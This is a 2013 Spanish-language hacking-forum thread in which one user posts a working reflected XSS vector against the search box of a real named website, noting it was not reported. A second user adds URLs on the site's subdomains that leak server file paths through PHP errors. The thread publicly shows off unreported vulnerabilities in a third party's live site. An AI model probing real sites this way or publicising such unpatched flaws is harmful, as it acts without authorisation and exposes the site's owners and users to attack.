Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: ANTRAX en Marzo 26, 2013, 03:28:14 pm

Título: [XSS] palermovalley.com
Publicado por: ANTRAX en Marzo 26, 2013, 03:28:14 pm
(http://img853.imageshack.us/img853/176/64830331.png)

URL: http://www.palermovalley.com
Vector utilizado: <script>alert("ANTRAX")</script>
Path afectado: buscador
Reportado: NO

Temas relativos al sitio
    [email protected]
Título: Re:[XSS] palermovalley.com
Publicado por: hdbreaker en Marzo 26, 2013, 03:42:43 pm
http://tandil.palermovalley.com/wp-content/plugins/podpress/tracker.php

<br />
<b>Warning</b>:  require_once(config.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/pvtandil/tandil.palermovalley.com/wp-content/plugins/podpress/tracker.php</b> on line <b>9</b><br />
<br />
<b>Fatal error</b>:  require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'config.php' (include_path='.:/usr/local/lib/php:/usr/local/php5/lib/pear') in <b>/home/pvtandil/tandil.palermovalley.com/wp-content/plugins/podpress/tracker.php</b> on line <b>9</b><br />

http://santafe.palermovalley.com/wp-content/plugins/photosmash-galleries/bwbps-rating.php


Warning: Call-time pass-by-reference has been deprecated in /home/pvsantafe/santafe.palermovalley.com/wp-content/plugins/photosmash-galleries/bwbps-rating.php on line 127

Warning: Call-time pass-by-reference has been deprecated in /home/pvsantafe/santafe.palermovalley.com/wp-content/plugins/photosmash-galleries/bwbps-rating.php on line 129